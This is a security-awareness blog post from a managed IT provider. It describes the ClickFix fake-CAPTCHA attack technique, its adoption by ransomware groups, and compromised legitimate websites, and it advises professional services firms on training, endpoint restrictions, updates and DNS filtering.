In April, we wrote about ClickFix as the single most common way attackers were getting into corporate networks. At the time, Cato Networks reported it in 57.5% of all identifiable incidents. CrowdStrike documented a 563% increase in fake CAPTCHA lures.

That was two months ago. It’s gotten worse.

Quick refresher: what ClickFix actually is

You visit a website. A popup appears asking you to verify you’re human, or telling you a font needs to be installed, or that your browser needs an update. The instructions say to press Win+R (or open Terminal on Mac), paste a command, and hit Enter.

That command downloads malware. The user ran it themselves, willingly, because they thought they were fixing a problem or proving they’re not a bot. No email attachment. No suspicious download. The user is the delivery mechanism.

What changed in the last two months

Ransomware gangs adopted ClickFix as their primary entry point. The LeakNet ransomware group is now using ClickFix to get into corporate environments. They pair it with a technique researchers call “bring your own runtime,” installing a legitimate JavaScript runtime (Deno) and running malicious code through it. Because Deno is a signed, legitimate developer tool, it bypasses most endpoint security. The payload runs entirely in memory, leaving minimal forensic evidence. The Termite and Interlock ransomware groups have adopted ClickFix as well.

When ransomware operators adopt a technique, it means the technique works reliably enough to build an entire criminal operation around.

Attackers compromised thousands of legitimate websites to serve ClickFix lures. A threat actor called DriveSurge (documented by Silent Push on June 1) has been hijacking legitimate, high-reputation websites and injecting malicious JavaScript. Visitors get profiled through a traffic distribution system, and qualifying targets see either a fake browser update or a ClickFix CAPTCHA prompt. Separately, a campaign exploiting a Ghost CMS vulnerability (CVE-2026-26980) planted ClickFix payloads on over 700 websites, including Harvard, Oxford, and Auburn university portals, DuckDuckGo, fintech companies, and media outlets.

These aren’t sketchy download sites. They’re websites your staff would have no reason to distrust.

Apple had to ship a macOS patch specifically to address it. In macOS Tahoe 26.4, Apple added a Terminal warning that blocks pasting and executing potentially harmful commands. They did this because ClickFix variants targeting Mac users appeared in early 2026, using macOS Script Editor to run malicious AppleScript. The Atomic Stealer malware was distributed this way. When Apple builds a new OS feature to address a social engineering technique, that technique has reached a certain scale.

The problem for professional services firms

If your staff regularly researches anything online (case law, tax codes, property records, vendor comparisons, real estate listings), they’re visiting the kinds of websites being compromised. University portals. Industry publications. Government resources.

The attack doesn’t arrive by email, which means email security tools don’t see it. It doesn’t involve downloading a file, which means traditional endpoint protection may not flag it. The user runs the command themselves, which means the system treats it as an authorized action.

Your security awareness training probably covers phishing emails and suspicious attachments. It probably doesn’t cover fake CAPTCHA prompts that ask you to paste something into a command prompt.

What to do about it

Update your training. Show your team what a ClickFix prompt looks like. The message is usually “Verify you are human,” “Install missing font,” or “Update your browser.” The giveaway is the instruction to open a command prompt or terminal and paste something. No legitimate website will ever ask you to do this. Make it a rule: if a website asks you to paste something into a command prompt, close the tab.

Review your endpoint policies. Can standard users run PowerShell scripts? Can they execute commands through Win+R? If there’s no business reason for non-IT staff to use these tools, restrict access. This won’t stop every variant, but it raises the barrier significantly.

Keep browsers and operating systems updated. Apple’s macOS Tahoe 26.4 patch specifically addresses the Terminal paste-and-execute pattern. Chrome and Edge have their own protections. These updates matter more than usual here.

DNS filtering catches some of this. The DriveSurge campaign uses a traffic distribution system (zTDS) to redirect users from compromised sites to malware infrastructure. DNS-level filtering can block known malicious redirect domains before the ClickFix prompt ever loads.

Brief your team on the “legitimate website” problem. The old advice was “don’t visit sketchy websites.” That doesn’t apply here. Harvard’s website was compromised. The attack comes from places people trust. The training message needs to shift from “be careful where you browse” to “be suspicious of any popup that asks you to run a command, no matter what site you’re on.”

This is an update to our April post, Most Cyberattacks Start the Same Way. Here’s What the Data Says, which first covered ClickFix as the leading initial access technique. The situation has escalated since then.

Artech Solutions provides managed IT and cybersecurity services to Iowa law firms and professional services companies. If you want to review your firm’s exposure to these kinds of attacks, get in touch.